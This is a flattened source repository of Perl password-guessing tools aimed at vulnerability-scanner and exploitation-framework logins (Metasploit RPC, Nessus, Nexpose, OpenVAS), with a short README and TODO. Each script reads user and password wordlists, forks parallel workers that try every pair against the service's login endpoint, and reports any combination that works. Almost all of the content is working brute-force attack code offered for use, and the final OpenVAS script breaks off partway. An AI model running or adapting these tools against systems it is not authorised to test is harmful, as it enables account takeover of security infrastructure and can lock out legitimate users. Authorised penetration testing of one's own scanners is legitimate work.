├── README ├── TODO ├── metasploit-rpc-pwcrack.pl ├── nessus-ntp-pwcrack.pl ├── nessus-xmlrpc-pwcrack.pl ├── nexpose-pwcrack.pl ├── openvas-omp-pwcrack.pl └── openvas-otp-pwcrack.pl /README: -------------------------------------------------------------------------------- 1 | Password crackers for popular vulnerability scanners. 2 | Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL. 3 | NSE scripts are released under Nmap Public License. 4 | 5 | Find the password for your favourite vulnerability scanner: 6 | - OpenVAS 7 | - Nessus 8 | - NeXpose 9 | and exploitation frameworks: 10 | - Metasploit XMLRPC 11 | 12 | Regarding NSE scripts: 13 | - All the scripts are now part of nmap (therefore I suggest to use 14 | versions found in nmap), so removed from head 15 | (you can still get them through git history if you need them for 16 | any strange reason) 17 | - You have to run version checking (-sV) 18 | - You have to force Nmap to use SSL for XMLRPC guessing in 19 | Nessus 20 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | ALL: 2 | - encode XML entities 3 | - support for non/SSL sockets 4 | 5 | metasploit: 6 | - benchmark which number of threads is fastest 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /metasploit-rpc-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Metasploit XMLRPC password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL 4 | 5 | use strict; 6 | use IO::Socket::SSL; 7 | use Getopt::Long; 8 | 9 | my $verbose = 0; 10 | my $mx_host = "localhost"; 11 | my $mx_port = "55553"; 12 | my $timeout = 15; 13 | my $userfile; 14 | my $passfile; 15 | my $maxreq = 16; 16 | my $usessl = 0; 17 | my $rpc = "msgpack"; 18 | my $uri = "/api/"; 19 | 20 | my @childs; 21 | my $ch=0; 22 | my $total=0; 23 | 24 | my $pid = 1; 25 | my $loop = 1; 26 | my $skipsslcheck = 0; 27 | 28 | 29 | Getopt::Long::Configure ("bundling"); 30 | 31 | my $result = GetOptions ( 32 | "i|ip=s" => \$mx_host, 33 | "p|port=i" => \$mx_port, 34 | "U|users=s" => \$userfile, 35 | "P|passwords=s" => \$passfile, 36 | "k|skipsslcheck" => \$skipsslcheck, 37 | "m|maxreq=i" => \$maxreq, 38 | "t|timeout=i" => \$timeout, 39 | "u|uri=s" => \$uri, 40 | "v|verbose+" => \$verbose, 41 | "s|ssl" => \$usessl, 42 | "r|rpc=s" => \$rpc, 43 | "h|help" => \&help 44 | ); 45 | 46 | $rpc = lc($rpc); 47 | 48 | unless ($userfile and $passfile) { 49 | help(); 50 | } 51 | 52 | print STDERR "Metasploit XMLRPC password cracker. (C) Kost. Distributed under GPL.\n\n"; 53 | 54 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 55 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 56 | 57 | my $userglob = ; 58 | chomp $userglob; 59 | 60 | my $mp; 61 | my $url; 62 | my $agent; 63 | 64 | if ($rpc eq "msgpack") { 65 | use Data::MessagePack; 66 | use LWP; 67 | use HTTP::Request; 68 | 69 | $mp = Data::MessagePack->new(); 70 | $url = ($usessl ? "https" : "http") . "://" . $mx_host . ":" . $mx_port . $uri; 71 | $agent = LWP::UserAgent->new ( 72 | ssl_opts => { 73 | verify_hostname => (not $skipsslcheck), 74 | } 75 | ); 76 | } 77 | 78 | $SIG{INT} = \&ctrlc; 79 | my %comb; 80 | 81 | print STDERR "[i] Cracking.\n"; 82 | my $starttime=time(); 83 | 84 | while ($loop) { 85 | if ($pid) { 86 | # print STDERR "Main/Parent\n"; 87 | %comb = getcomb(); 88 | 89 | if ($comb{'nomore'} == 1) { 90 | $loop = 0; 91 | next; 92 | } 93 | if ($ch<$maxreq) { 94 | $ch++; 95 | # print STDERR "Forking $ch\n"; 96 | $pid = fork(); 97 | die ("[e] cannot fork: $!") if (!defined($pid)); 98 | if ($pid) { 99 | push @childs, $pid; 100 | $total++; 101 | } 102 | } else { 103 | # wait for children to die 104 | while ($#childs>0) { 105 | #print STDERR "waiting to die\n"; 106 | if (my $oldpid=waitpid(-1, 0)) { 107 | # print STDERR "Oldpid: $oldpid\n"; 108 | foreach my $i (0 .. $#childs) { 109 | next if ($oldpid); 110 | if ($childs[$i] eq $oldpid) { 111 | delete $childs[$i]; 112 | last; 113 | } 114 | } 115 | $total++; 116 | $pid = fork(); 117 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 118 | if ($pid) { 119 | push @childs, $pid; 120 | last if ($loop==0); 121 | } else { 122 | last;# if children skip while loop 123 | 124 | } 125 | last; 126 | } 127 | } 128 | if ($pid) {%comb = getcomb();} 129 | next; 130 | } 131 | } 132 | unless ($pid) { 133 | # children 134 | # print STDERR "Children\n"; 135 | if ($rpc eq "msgpack") { 136 | mx_msgpack_guess($comb{'user'},$comb{'pass'}); 137 | } else { 138 | mx_guess($comb{'user'},$comb{'pass'}); 139 | } 140 | exit(0); 141 | } 142 | } 143 | 144 | $SIG{'INT'} = 'DEFAULT'; 145 | foreach (@childs) { 146 | waitpid($_, 0) 147 | } 148 | 149 | my $endtime = time(); 150 | my $difftime = $endtime - $starttime; 151 | 152 | print STDERR "\n"; 153 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 154 | print STDERR "[i] END\n"; 155 | 156 | sub getcomb { 157 | my %comb; 158 | while (1) { 159 | unless ($comb{'pass'} = ) { 160 | while (1) { 161 | unless ($comb{'user'} = ) { 162 | $comb{'nomore'} = 1; 163 | return %comb; 164 | } else { 165 | chomp($comb{'user'}); 166 | if ($comb{'user'} eq '') { 167 | next; 168 | } else { 169 | $userglob=$comb{'user'}; 170 | seek (PASS,0,0); 171 | last; 172 | } 173 | } 174 | } 175 | } else { 176 | $comb{'user'}=$userglob; 177 | chomp($comb{'pass'}); 178 | if ($comb{'pass'} eq '') { 179 | next; 180 | } else { 181 | last 182 | } 183 | } 184 | } 185 | $comb{'nomore'} = 0; 186 | return %comb; 187 | } 188 | 189 | sub ctrlc { 190 | $SIG{INT} = \&ctrlc; 191 | print "\nCTRL+C presssed, stopping.\n"; 192 | $loop=0; 193 | } 194 | 195 | sub mx_msgpack_guess { 196 | my ($user, $password) = @_; 197 | 198 | my @rapack = ('auth.login',$user,$password); 199 | 200 | my $req = new HTTP::Request('POST',$url); 201 | print STDERR "[i] Combination $user:$password: Connecting to $url\n" if ($verbose>2); 202 | $req->content_type('binary/message-pack'); 203 | my $mp = Data::MessagePack->new(); 204 | $req->content($mp->pack(\@rapack)); 205 | my $res = $agent->request($req); 206 | 207 | if ($res->code != 200) { 208 | print STDERR "[i] Combination $user:$password: Expected 200 response, got ".$res->code." Maybe you want to skip SSL check? is it really MSF?\n"; 209 | print STDERR "[i] Combination $user:$password: Response got: ".$res->content."\n" if ($verbose>3); 210 | return; 211 | } 212 | 213 | my $response = $mp->unpack($res->content); 214 | if ($response->{'result'} eq 'success') { 215 | print STDERR "[i] Combination $user:$password: Sucess\n" if ($verbose>1); 216 | print "[o] Success! User: $user and Password: $password\n"; 217 | } else { 218 | print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1); 219 | } 220 | } 221 | 222 | sub mx_guess { 223 | my ($user, $password) = @_; 224 | my $mx_sock; 225 | if ($usessl) { 226 | $mx_sock = IO::Socket::SSL->new( 227 | PeerAddr => $mx_host, 228 | PeerPort => $mx_port, 229 | SSL_verify_mode => 0, 230 | Timeout => $timeout 231 | ); 232 | } else { 233 | $mx_sock = IO::Socket::SSL->new( 234 | PeerAddr => $mx_host, 235 | PeerPort => $mx_port, 236 | Timeout => $timeout 237 | ); 238 | } 239 | if(!$mx_sock) { 240 | warn ("[w] Cannot connect to sock: $!"); 241 | return; 242 | } 243 | $mx_sock->autoflush(); 244 | 245 | my $xmldata='auth.login'.$user.''.$password.''."\n\x00"; 246 | print STDERR "[d] Sending login data: " if ($verbose>3); 247 | $mx_sock->print($xmldata); 248 | print STDERR "done!\n" if ($verbose>3); 249 | 250 | print STDERR "[d] Waiting for answer line: " if ($verbose>3); 251 | my $line = $mx_sock->getline; 252 | print STDERR "done!\n" if ($verbose>3); 253 | 254 | unless ($mx_sock->connected) { 255 | print STDERR "[i] Combination $user:$password: Disconnected\n" if ($verbose>0); 256 | } 257 | 258 | if($line =~ /faultString<\/name>authentication error<\/string><\/value>/gis) { 259 | print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1); 260 | } elsif ($line =~ /result<\/name>success<\/string>/gis) { 261 | print STDERR "[i] Combination $user:$password: Sucess\n" if ($verbose>1); 262 | print "[o] Success! User: $user and Password: $password\n"; 263 | } else { 264 | print STDERR "[i] Combination $user:$password: Unknown\n" if ($verbose>0); 265 | } 266 | 267 | if ($usessl) { 268 | $mx_sock->close(SSL_ctx_free => 1); 269 | } else { 270 | $mx_sock->close(); 271 | } 272 | } 273 | 274 | sub help 275 | { 276 | print "$0: Metasploit XMLRPC password cracker. \n"; 277 | print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n"; 278 | print "Usage: $0 -s -i 127.0.0.1 -p 55553 -U userlist.txt -P passlist.txt\n\n"; 279 | print " -i Use hostname or IP (default: $mx_host)\n"; 280 | print " -p

Use port

(default: $mx_port)\n"; 281 | print " -U Use user list \n"; 282 | print " -P

Use password list

\n"; 283 | print " -s use SSL\n"; 284 | print " -k skip SSL certificate check\n"; 285 | print " -r use RPC style interface : msgpack or oldrpc (default: $rpc)\n"; 286 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 287 | print " -t use sock timeout \n"; 288 | print " -v verbose (-vv will display every combination tried)\n"; 289 | print " -h this help message\n"; 290 | exit (0); 291 | } 292 | -------------------------------------------------------------------------------- /nessus-ntp-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Nessus NTP password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL 4 | 5 | use strict; 6 | use IO::Socket::SSL; 7 | use Getopt::Long; 8 | 9 | my $verbose = 0; 10 | my $ov_host = "localhost"; 11 | my $ov_port = "9390"; 12 | my $ov_hello = "< NTP/1.0 >\n"; 13 | my $timeout = 15; 14 | my $userfile; 15 | my $passfile; 16 | my $maxreq = 16; 17 | 18 | my @childs; 19 | my $ch=0; 20 | my $total=0; 21 | 22 | my $pid = 1; 23 | my $loop = 1; 24 | 25 | Getopt::Long::Configure ("bundling"); 26 | 27 | my $result = GetOptions ( 28 | "i|ip=s" => \$ov_host, 29 | "p|port=i" => \$ov_port, 30 | "U|users=s" => \$userfile, 31 | "P|passwords=s" => \$passfile, 32 | "m|maxreq=i" => \$maxreq, 33 | "t|timeout=i" => \$timeout, 34 | "v|verbose+" => \$verbose, 35 | "h|help" => \&help 36 | ); 37 | 38 | unless ($userfile and $passfile) { 39 | help(); 40 | } 41 | 42 | print STDERR "Nessus NTP password cracker. (C) Kost. Distributed under GPL.\n\n"; 43 | 44 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 45 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 46 | 47 | my $userglob = ; 48 | chomp $userglob; 49 | 50 | $SIG{INT} = \&ctrlc; 51 | my %comb; 52 | 53 | print STDERR "[i] Cracking.\n"; 54 | my $starttime=time(); 55 | 56 | while ($loop) { 57 | if ($pid) { 58 | # print STDERR "Main/Parent\n"; 59 | %comb = getcomb(); 60 | 61 | if ($comb{'nomore'} == 1) { 62 | $loop = 0; 63 | next; 64 | } 65 | if ($ch<$maxreq) { 66 | $ch++; 67 | # print STDERR "Forking $ch\n"; 68 | $pid = fork(); 69 | die ("[e] cannot fork: $!") if (!defined($pid)); 70 | if ($pid) { 71 | push @childs, $pid; 72 | $total++; 73 | } 74 | } else { 75 | # wait for children to die 76 | while ($#childs>0) { 77 | #print STDERR "waiting to die\n"; 78 | if (my $oldpid=waitpid(-1, 0)) { 79 | # print STDERR "Oldpid: $oldpid\n"; 80 | foreach my $i (0 .. $#childs) { 81 | next if ($oldpid); 82 | if ($childs[$i] eq $oldpid) { 83 | delete $childs[$i]; 84 | last; 85 | } 86 | } 87 | $total++; 88 | $pid = fork(); 89 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 90 | if ($pid) { 91 | push @childs, $pid; 92 | last if ($loop==0); 93 | } else { 94 | last;# if children skip while loop 95 | 96 | } 97 | last; 98 | } 99 | } 100 | if ($pid) {%comb = getcomb();} 101 | next; 102 | } 103 | } 104 | unless ($pid) { 105 | # children 106 | # print STDERR "Children\n"; 107 | ov_guess($comb{'user'},$comb{'pass'}); 108 | exit(0); 109 | } 110 | } 111 | 112 | $SIG{'INT'} = 'DEFAULT'; 113 | foreach (@childs) { 114 | waitpid($_, 0) 115 | } 116 | 117 | my $endtime = time(); 118 | my $difftime = $endtime - $starttime; 119 | 120 | print STDERR "\n"; 121 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 122 | print STDERR "[i] END\n"; 123 | 124 | sub getcomb { 125 | my %comb; 126 | while (1) { 127 | unless ($comb{'pass'} = ) { 128 | while (1) { 129 | unless ($comb{'user'} = ) { 130 | $comb{'nomore'} = 1; 131 | return %comb; 132 | } else { 133 | chomp($comb{'user'}); 134 | if ($comb{'user'} eq '') { 135 | next; 136 | } else { 137 | $userglob=$comb{'user'}; 138 | seek (PASS,0,0); 139 | last; 140 | } 141 | } 142 | } 143 | } else { 144 | $comb{'user'}=$userglob; 145 | chomp($comb{'pass'}); 146 | if ($comb{'pass'} eq '') { 147 | next; 148 | } else { 149 | last 150 | } 151 | } 152 | } 153 | $comb{'nomore'} = 0; 154 | return %comb; 155 | } 156 | 157 | sub ctrlc { 158 | $SIG{INT} = \&ctrlc; 159 | print "\nCTRL+C presssed, stopping.\n"; 160 | $loop=0; 161 | } 162 | 163 | sub ov_guess { 164 | my ($user, $password) = @_; 165 | my $ov_sock = IO::Socket::SSL->new( 166 | PeerAddr => $ov_host, 167 | PeerPort => $ov_port, 168 | SSL_verify_mode => 0, 169 | Timeout => $timeout 170 | ); 171 | if(!$ov_sock) { 172 | warn ("[w] Cannot connect to sock: $!"); 173 | return; 174 | } 175 | $ov_sock->autoflush(); 176 | 177 | $ov_sock->print($ov_hello); 178 | my $line = $ov_sock->getline; 179 | 180 | if(!defined($line)) { 181 | $ov_sock->close(SSL_ctx_free => 1); 182 | warn ("[w] Hmm. No answer. Is it Nessus server or TCP wrapped ?"); 183 | return; 184 | } 185 | 186 | if($line eq $ov_hello) { 187 | print STDERR "[d] Handshake OK\n" if ($verbose>3); 188 | } else { 189 | $ov_sock->close(SSL_ctx_free => 1); 190 | warn ("[w] Hmm. Strange answer. Is it Nessus server?"); 191 | return; 192 | } 193 | 194 | print STDERR "[d] Sending login data: " if ($verbose>3); 195 | $ov_sock->print($user ."\n"); 196 | $ov_sock->print($password . "\n"); 197 | print STDERR "done!\n" if ($verbose>3); 198 | 199 | print STDERR "[d] Waiting for answer line: " if ($verbose>3); 200 | $line = $ov_sock->getline; 201 | print STDERR "done!\n" if ($verbose>3); 202 | 203 | unless ($ov_sock->connected) { 204 | print STDERR "[i] Combination $user:$password: Disconnected\n" if ($verbose>0); 205 | } 206 | 207 | if($line =~ /Bad login/gis) { 208 | print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1); 209 | } elsif ($line =~ /SERVER <|>.*<|> SERVER/gis) { 210 | print STDERR "[i] Combination $user:$password: Sucess\n" if ($verbose>1); 211 | print "[o] Success! User: $user and Password: $password\n"; 212 | } else { 213 | print STDERR "[i] Combination $user:$password: Unknown\n" if ($verbose>0); 214 | } 215 | 216 | $ov_sock->close(SSL_ctx_free => 1); 217 | } 218 | 219 | sub help 220 | { 221 | print "$0: Nessus NTP password cracker. \n"; 222 | print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n"; 223 | print "Usage: $0 -i 127.0.0.1 -p 9390 -U userlist.txt -P passlist.txt\n\n"; 224 | print " -i Use hostname or IP (default: $ov_host)\n"; 225 | print " -p

Use port

(default: $ov_port)\n"; 226 | print " -U Use user list \n"; 227 | print " -P

Use password list

\n"; 228 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 229 | print " -t use sock timeout \n"; 230 | print " -v verbose (-vv will display every combination tried)\n"; 231 | print " -h this help message\n"; 232 | exit (0); 233 | } 234 | -------------------------------------------------------------------------------- /nessus-xmlrpc-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Nessus XMLRPC password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL. 4 | 5 | use strict; 6 | 7 | use Getopt::Long; 8 | use LWP::UserAgent; 9 | use HTTP::Request::Common; 10 | 11 | my $nessus_url = "https://localhost:8834/login"; 12 | my $verbose = 0; 13 | my $debug = 0; 14 | my $userfile; 15 | my $passfile; 16 | 17 | my $maxreq = 16; 18 | my @childs; 19 | my $ch=0; 20 | my $total=0; 21 | 22 | my $pid = 1; 23 | my $loop = 1; 24 | 25 | my $result = GetOptions ( 26 | "u|url=s" => \$nessus_url, 27 | "U|users=s" => \$userfile, 28 | "P|passwords=s" => \$passfile, 29 | "m|maxreq=i" => \$maxreq, 30 | "v|verbose" => \$verbose, 31 | "d|debug" => \$debug, 32 | "h|help" => \&help 33 | ); 34 | 35 | unless ($userfile and $passfile) { 36 | help(); 37 | } 38 | 39 | print STDERR "Nessus XMLRPC password cracker. (C) Kost. Distributed under GPL.\n\n"; 40 | 41 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 42 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 43 | 44 | my $userglob = ; 45 | chomp $userglob; 46 | 47 | $SIG{INT} = \&ctrlc; 48 | my %comb; 49 | 50 | print STDERR "[i] Cracking.\n"; 51 | my $starttime=time(); 52 | 53 | while ($loop) { 54 | if ($pid) { 55 | # print STDERR "Main/Parent\n"; 56 | %comb = getcomb(); 57 | 58 | if ($comb{'nomore'} == 1) { 59 | $loop = 0; 60 | next; 61 | } 62 | if ($ch<$maxreq) { 63 | $ch++; 64 | # print STDERR "Forking $ch\n"; 65 | $pid = fork(); 66 | die ("[e] cannot fork: $!") if (!defined($pid)); 67 | if ($pid) { 68 | push @childs, $pid; 69 | $total++; 70 | } 71 | } else { 72 | # wait for children to die 73 | while ($#childs>0) { 74 | #print STDERR "waiting to die\n"; 75 | if (my $oldpid=waitpid(-1, 0)) { 76 | # print STDERR "Oldpid: $oldpid\n"; 77 | foreach my $i (0 .. $#childs) { 78 | next if ($oldpid); 79 | if ($childs[$i] eq $oldpid) { 80 | delete $childs[$i]; 81 | last; 82 | } 83 | } 84 | $total++; 85 | $pid = fork(); 86 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 87 | if ($pid) { 88 | push @childs, $pid; 89 | last if ($loop==0); 90 | } else { 91 | last;# if children skip while loop 92 | 93 | } 94 | last; 95 | } 96 | } 97 | if ($pid) {%comb = getcomb();} 98 | next; 99 | } 100 | } 101 | unless ($pid) { 102 | # children 103 | # print STDERR "Children\n"; 104 | guess($comb{'user'},$comb{'pass'}); 105 | exit(0); 106 | } 107 | } 108 | 109 | $SIG{'INT'} = 'DEFAULT'; 110 | foreach (@childs) { 111 | waitpid($_, 0) 112 | } 113 | 114 | my $endtime = time(); 115 | my $difftime = $endtime - $starttime; 116 | 117 | print STDERR "\n"; 118 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 119 | print STDERR "[i] END\n"; 120 | 121 | sub getcomb { 122 | my %comb; 123 | while (1) { 124 | unless ($comb{'pass'} = ) { 125 | while (1) { 126 | unless ($comb{'user'} = ) { 127 | $comb{'nomore'} = 1; 128 | return %comb; 129 | } else { 130 | chomp($comb{'user'}); 131 | if ($comb{'user'} eq '') { 132 | next; 133 | } else { 134 | $userglob=$comb{'user'}; 135 | seek (PASS,0,0); 136 | last; 137 | } 138 | } 139 | } 140 | } else { 141 | $comb{'user'}=$userglob; 142 | chomp($comb{'pass'}); 143 | if ($comb{'pass'} eq '') { 144 | next; 145 | } else { 146 | last 147 | } 148 | } 149 | } 150 | $comb{'nomore'} = 0; 151 | return %comb; 152 | } 153 | 154 | sub ctrlc { 155 | $SIG{INT} = \&ctrlc; 156 | print "\nCTRL+C presssed, stopping.\n"; 157 | $loop=0; 158 | } 159 | 160 | sub guess { 161 | my ($user, $password) = @_; 162 | 163 | my $post_data = { login => $user, password => $password }; 164 | 165 | my $ua = LWP::UserAgent->new; 166 | my $request = POST $nessus_url, $post_data; 167 | 168 | if ($debug) { 169 | $ua->add_handler("request_send", sub { shift->dump; return }); 170 | $ua->add_handler("response_done", sub { shift->dump; return }); 171 | } 172 | 173 | my $result = $ua->request($request); 174 | if ($result->is_success) { 175 | if ($result->content =~ /Invalid login<\/contents>/) { 176 | print STDERR "[i] Trying $user:$password: Wrong\n" if ($verbose); 177 | } elsif ($result->content =~ /OK<\/status>/) { 178 | print STDERR "[i] Trying $user:$password: Success\n" if ($verbose); 179 | print "[o] Success! User: $user and Password: $password\n"; 180 | } else { 181 | print STDERR "[i] Trying $user:$password: Unknown\n" if ($verbose); 182 | } 183 | } else { 184 | print STDERR "[i] Trying $user:$password: Cannot login! Check your URL of Nessus!\n"; 185 | } 186 | } 187 | 188 | sub help 189 | { 190 | print "$0: Nessus XMLRPC password cracker. \n"; 191 | print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n"; 192 | print "Usage: $0 -u https://localhost:8834/login -U userlist.txt -P passlist.txt\n\n"; 193 | print " -u use for URL for Nessus login (default: $nessus_url)\n"; 194 | print " -U Use user list \n"; 195 | print " -P

Use password list

\n"; 196 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 197 | print " -v verbose\n"; 198 | print " -d debug (be very verbose)\n"; 199 | print " -h this help message\n"; 200 | print "\n"; 201 | exit (0); 202 | } 203 | -------------------------------------------------------------------------------- /nexpose-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Nexpose password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL. 4 | 5 | use strict; 6 | 7 | use Getopt::Long; 8 | use LWP::UserAgent; 9 | use HTTP::Request::Common; 10 | 11 | my $nexpose_url = "https://localhost:3780/api/1.1/xml"; 12 | my $verbose = 0; 13 | my $debug = 0; 14 | my $userfile; 15 | my $passfile; 16 | 17 | my $maxreq = 16; 18 | my @childs; 19 | my $ch=0; 20 | my $total=0; 21 | 22 | my $pid = 1; 23 | my $loop = 1; 24 | 25 | my $result = GetOptions ( 26 | "u|url=s" => \$nexpose_url, 27 | "U|users=s" => \$userfile, 28 | "P|passwords=s" => \$passfile, 29 | "m|maxreq=i" => \$maxreq, 30 | "v|verbose" => \$verbose, 31 | "d|debug" => \$debug, 32 | "h|help" => \&help 33 | ); 34 | 35 | unless ($userfile and $passfile) { 36 | help(); 37 | } 38 | 39 | print STDERR "Nexpose password cracker. (C) Kost. Distributed under GPL.\n\n"; 40 | 41 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 42 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 43 | 44 | my $userglob = ; 45 | chomp $userglob; 46 | 47 | $SIG{INT} = \&ctrlc; 48 | my %comb; 49 | 50 | print STDERR "[i] Cracking.\n"; 51 | my $starttime=time(); 52 | 53 | while ($loop) { 54 | if ($pid) { 55 | # print STDERR "Main/Parent\n"; 56 | %comb = getcomb(); 57 | 58 | if ($comb{'nomore'} == 1) { 59 | $loop = 0; 60 | next; 61 | } 62 | if ($ch<$maxreq) { 63 | $ch++; 64 | # print STDERR "Forking $ch\n"; 65 | $pid = fork(); 66 | die ("[e] cannot fork: $!") if (!defined($pid)); 67 | if ($pid) { 68 | push @childs, $pid; 69 | $total++; 70 | } 71 | } else { 72 | # wait for children to die 73 | while ($#childs>0) { 74 | #print STDERR "waiting to die\n"; 75 | if (my $oldpid=waitpid(-1, 0)) { 76 | # print STDERR "Oldpid: $oldpid\n"; 77 | foreach my $i (0 .. $#childs) { 78 | next if ($oldpid); 79 | if ($childs[$i] eq $oldpid) { 80 | delete $childs[$i]; 81 | last; 82 | } 83 | } 84 | $total++; 85 | $pid = fork(); 86 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 87 | if ($pid) { 88 | push @childs, $pid; 89 | last if ($loop==0); 90 | } else { 91 | last;# if children skip while loop 92 | 93 | } 94 | last; 95 | } 96 | } 97 | if ($pid) {%comb = getcomb();} 98 | next; 99 | } 100 | } 101 | unless ($pid) { 102 | # children 103 | # print STDERR "Children\n"; 104 | guess($comb{'user'},$comb{'pass'}); 105 | exit(0); 106 | } 107 | } 108 | 109 | $SIG{'INT'} = 'DEFAULT'; 110 | foreach (@childs) { 111 | waitpid($_, 0) 112 | } 113 | 114 | my $endtime = time(); 115 | my $difftime = $endtime - $starttime; 116 | 117 | print STDERR "\n"; 118 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 119 | print STDERR "[i] END\n"; 120 | 121 | sub getcomb { 122 | my %comb; 123 | while (1) { 124 | unless ($comb{'pass'} = ) { 125 | while (1) { 126 | unless ($comb{'user'} = ) { 127 | $comb{'nomore'} = 1; 128 | return %comb; 129 | } else { 130 | chomp($comb{'user'}); 131 | if ($comb{'user'} eq '') { 132 | next; 133 | } else { 134 | $userglob=$comb{'user'}; 135 | seek (PASS,0,0); 136 | last; 137 | } 138 | } 139 | } 140 | } else { 141 | $comb{'user'}=$userglob; 142 | chomp($comb{'pass'}); 143 | if ($comb{'pass'} eq '') { 144 | next; 145 | } else { 146 | last 147 | } 148 | } 149 | } 150 | $comb{'nomore'} = 0; 151 | return %comb; 152 | } 153 | 154 | sub ctrlc { 155 | $SIG{INT} = \&ctrlc; 156 | print "\nCTRL+C presssed, stopping.\n"; 157 | $loop=0; 158 | } 159 | 160 | sub guess { 161 | my ($user, $password) = @_; 162 | 163 | my $post_data = ''; 164 | 165 | my $ua = LWP::UserAgent->new; 166 | my $request = POST $nexpose_url, 'Content-Type'=>'text/xml', Content=>$post_data; 167 | 168 | if ($debug) { 169 | $ua->add_handler("request_send", sub { shift->dump; return }); 170 | $ua->add_handler("response_done", sub { shift->dump; return }); 171 | } 172 | 173 | my $result = $ua->request($request); 174 | if ($result->is_success) { 175 | if ($result->content =~ /LoginResponse.*success="0"/) { 176 | print STDERR "[i] Trying $user:$password: Wrong\n" if ($verbose); 177 | } elsif ($result->content =~ /LoginResponse.*success="1"/) { 178 | print STDERR "[i] Trying $user:$password: Success\n" if ($verbose); 179 | print "[o] Success! User: $user and Password: $password\n"; 180 | } else { 181 | print STDERR "[i] Trying $user:$password: Unknown\n" if ($verbose); 182 | } 183 | } else { 184 | print STDERR "[i] Trying $user:$password: Cannot login! Check your URL of Nexpose!\n"; 185 | } 186 | } 187 | 188 | sub help 189 | { 190 | print "$0: Nexpose password cracker. \n"; 191 | print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n"; 192 | print "Usage: $0 -u https://localhost:3780/api/1.1/xml -U userlist.txt -P passlist.txt\n\n"; 193 | print " -u use for URL for Nexpose API (default: $nexpose_url)\n"; 194 | print " -U Use user list \n"; 195 | print " -P

Use password list

\n"; 196 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 197 | print " -v verbose\n"; 198 | print " -d debug (be very verbose)\n"; 199 | print " -h this help message\n"; 200 | print "\n"; 201 | print "Note: Nexpose will lock accounts by default! Make sure you know what you're doing!\n"; 202 | exit (0); 203 | } 204 | -------------------------------------------------------------------------------- /openvas-omp-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # OpenVAS OMP password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL 4 | 5 | use strict; 6 | use IO::Socket::SSL; 7 | use Getopt::Long; 8 | 9 | $!=1; 10 | 11 | my $verbose = 0; 12 | my $ov_host = "localhost"; 13 | my $ov_port = "9390"; 14 | my $timeout = 30; 15 | my $userfile; 16 | my $passfile; 17 | my $maxreq = 16; 18 | 19 | my @childs; 20 | my $ch=0; 21 | my $total=0; 22 | 23 | my $pid = 1; 24 | my $loop = 1; 25 | 26 | Getopt::Long::Configure ("bundling"); 27 | 28 | my $result = GetOptions ( 29 | "i|ip=s" => \$ov_host, 30 | "p|port=i" => \$ov_port, 31 | "U|users=s" => \$userfile, 32 | "P|passwords=s" => \$passfile, 33 | "m|maxreq=i" => \$maxreq, 34 | "t|timeout=i" => \$timeout, 35 | "v|verbose+" => \$verbose, 36 | "h|help" => \&help 37 | ); 38 | 39 | unless ($userfile and $passfile) { 40 | help(); 41 | } 42 | 43 | print STDERR "OpenVAS OMP password cracker. (C) Kost. Distributed under GPL.\n\n"; 44 | 45 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 46 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 47 | 48 | my $userglob = ; 49 | chomp $userglob; 50 | 51 | $SIG{INT} = \&ctrlc; 52 | my %comb; 53 | 54 | print STDERR "[i] Cracking.\n"; 55 | my $starttime=time(); 56 | 57 | while ($loop) { 58 | if ($pid) { 59 | # print STDERR "Main/Parent\n"; 60 | %comb = getcomb(); 61 | 62 | if ($comb{'nomore'} == 1) { 63 | $loop = 0; 64 | next; 65 | } 66 | if ($ch<$maxreq) { 67 | $ch++; 68 | # print STDERR "Forking $ch\n"; 69 | $pid = fork(); 70 | die ("[e] cannot fork: $!") if (!defined($pid)); 71 | if ($pid) { 72 | push @childs, $pid; 73 | $total++; 74 | } 75 | } else { 76 | # wait for children to die 77 | while ($#childs>0) { 78 | #print STDERR "waiting to die\n"; 79 | if (my $oldpid=waitpid(-1, 0)) { 80 | # print STDERR "Oldpid: $oldpid\n"; 81 | foreach my $i (0 .. 